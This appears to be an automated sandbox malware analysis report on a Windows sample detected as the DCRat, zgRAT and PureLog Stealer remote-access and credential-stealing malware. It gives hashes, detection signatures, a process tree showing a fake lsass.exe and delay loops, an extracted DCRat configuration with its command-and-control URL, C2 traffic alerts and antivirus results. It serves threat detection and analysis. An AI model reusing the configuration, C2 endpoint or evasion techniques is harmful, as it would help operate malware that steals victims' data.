Edit tour

Windows Analysis Report
Qsi7IgkrWa.exe

Overview

General Information

Sample name:	Qsi7IgkrWa.exe renamed because original name is a hash value
Original sample name:	6296cf36bbbbe91b8ff186d18a08afa3.exe
Analysis ID:	1569639
MD5:	6296cf36bbbbe91b8ff186d18a08afa3
SHA1:	3c71d4099d817731504433785dd2166f81d8ef15
SHA256:	5e0bd8298a3193c217f563a32aae650eb29dbb513716c34a4b7698309edd1f70
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Drops PE files with benign system names

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Sigma detected: Windows Binaries Write Suspicious Extensions

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Unusual Parent Process For Cmd.EXE

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Qsi7IgkrWa.exe (PID: 5216 cmdline: "C:\Users\user\Desktop\Qsi7IgkrWa.exe" MD5: 6296CF36BBBBE91B8FF186D18A08AFA3)

wscript.exe (PID: 5288 cmdline: "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 6908 cmdline: C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ComponentBrowserruntimeHostNet.exe (PID: 5296 cmdline: "C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 1260 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7004 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

lsass.exe (PID: 1368 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 2596 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1360 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 1148 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

lsass.exe (PID: 3412 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 2724 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1908 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6836 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

lsass.exe (PID: 5804 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 824 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6568 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6916 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

lsass.exe (PID: 1432 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 2144 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4088 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4520 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

lsass.exe (PID: 3896 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 2212 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2080 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 5228 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

lsass.exe (PID: 5144 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 2848 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2176 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 5368 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

lsass.exe (PID: 3964 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 4136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3236 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6160 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

lsass.exe (PID: 4128 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 7000 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6256 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 2520 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

lsass.exe (PID: 5652 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 980 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1228 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2564 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

lsass.exe (PID: 3068 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)

cmd.exe (PID: 6328 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6500 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6436 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp", "MUTEX": "DCR_MUTEX-bYSevfnxifF6AWqcLL5C", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Qsi7IgkrWa.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
Qsi7IgkrWa.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\HypercontainerServerhostDll\TextInputHost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\HypercontainerServerhostDll\TextInputHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\HypercontainerServerhostDll\TextInputHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\HypercontainerServerhostDll\TextInputHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\lsass.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\lsass.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\lsass.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\lsass.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1653046738.000000000623E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1653971657.0000000006A3D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000000.1725030909.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ComponentBrowserruntimeHostNet.exe PID: 5296	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: lsass.exe PID: 1368	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.Qsi7IgkrWa.exe.6a42121.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.Qsi7IgkrWa.exe.6a42121.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.Qsi7IgkrWa.exe.6243121.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.Qsi7IgkrWa.exe.6243121.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, ProcessId: 5296, TargetFilename: C:\Recovery\lsass.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Recovery\lsass.exe" , CommandLine: "C:\Recovery\lsass.exe" , CommandLine|base64offset|contains: , Image: C:\Recovery\lsass.exe, NewProcessName: C:\Recovery\lsass.exe, OriginalFileName: C:\Recovery\lsass.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1260, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Recovery\lsass.exe" , ProcessId: 1368, ProcessName: lsass.exe

Sigma detected: Windows Binaries Write Suspicious Extensions

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Recovery\lsass.exe, ProcessId: 1368, TargetFilename: C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat

Sigma detected: Unusual Parent Process For Cmd.EXE

Source: Process started

Author: Tim Rauch: Data: Command: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" , CommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Recovery\lsass.exe" , ParentImage: C:\Recovery\lsass.exe, ParentProcessId: 1368, ParentProcessName: lsass.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" , ProcessId: 2596, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Qsi7IgkrWa.exe", ParentImage: C:\Users\user\Desktop\Qsi7IgkrWa.exe, ParentProcessId: 5216, ParentProcessName: Qsi7IgkrWa.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" , ProcessId: 5288, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T01:42:17.898445+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49734	37.44.238.250	80	TCP
2024-12-06T01:42:31.195384+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49737	37.44.238.250	80	TCP
2024-12-06T01:42:39.992268+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49738	37.44.238.250	80	TCP
2024-12-06T01:42:53.226683+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49739	37.44.238.250	80	TCP
2024-12-06T01:43:06.601728+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49762	37.44.238.250	80	TCP
2024-12-06T01:43:15.086183+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49781	37.44.238.250	80	TCP
2024-12-06T01:43:23.586177+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49801	37.44.238.250	80	TCP
2024-12-06T01:43:32.804998+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49823	37.44.238.250	80	TCP
2024-12-06T01:43:41.383131+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49844	37.44.238.250	80	TCP
2024-12-06T01:43:54.133125+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49872	37.44.238.250	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Qsi7IgkrWa.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://595506cm.n9shka.top/	Avira URL Cloud: Label: malware
Source: http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php	Avira URL Cloud: Label: malware
Source: http://595506cm.n9shka.top	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Avira: detection malicious, Label: TR/Spy.Agent.qwlok
Source: C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\CmKYhHkf.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Avira: detection malicious, Label: TR/Spy.Agent.qwlok
Source: C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\CKyWUHyH.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\HypercontainerServerhostDll\TextInputHost.exe	Avira: detection malicious, Label: TR/Spy.Agent.qwlok
Source: C:\Users\user\Desktop\AFUvvHdz.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\GQmWAABO.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\lsass.exe	Avira: detection malicious, Label: TR/Spy.Agent.qwlok
Source: C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Avira: detection malicious, Label: TR/Spy.Agent.qwlok
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Avira: detection malicious, Label: TR/Spy.Agent.qwlok

Found malware configuration

Source: 00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp", "MUTEX": "DCR_MUTEX-bYSevfnxifF6AWqcLL5C", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for domain / URL

Source: 595506cm.n9shka.top	Virustotal: Detection: 14%			Perma Link
Source: http://595506cm.n9shka.top/	Virustotal: Detection: 14%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	ReversingLabs: Detection: 83%
Source: C:\HypercontainerServerhostDll\TextInputHost.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\lsass.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\AFUvvHdz.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\AsWoiMty.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\CKyWUHyH.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\CYkgyfvY.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\CmKYhHkf.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\FrxXNAmm.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\GQmWAABO.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\LkfFbrxk.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\MtSmEjDp.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\QrHcjUSw.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\RIKTmlsJ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\TBLKldEI.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\UKBLugCN.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\XVlEhDHN.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\XmyUnkUi.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\YBBlCWWw.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\ZPkAsstD.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\brdjWOxr.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\dhGiqFYl.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\gVSkXNZP.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\gtMhCYIK.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\heJamQmd.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\iAcIGVjp.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\icHKrlAV.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\kwMHLMmE.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\nPayaidT.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\oZQzjlbX.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\phNJAZcc.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\qjmAjDHY.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\reDyPeef.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\tIBixNUy.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\vXhOtgDl.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\whSGRYvh.log	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: Qsi7IgkrWa.exe	ReversingLabs: Detection: 71%
Source: Qsi7IgkrWa.exe	Virustotal: Detection: 59%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for dropped file

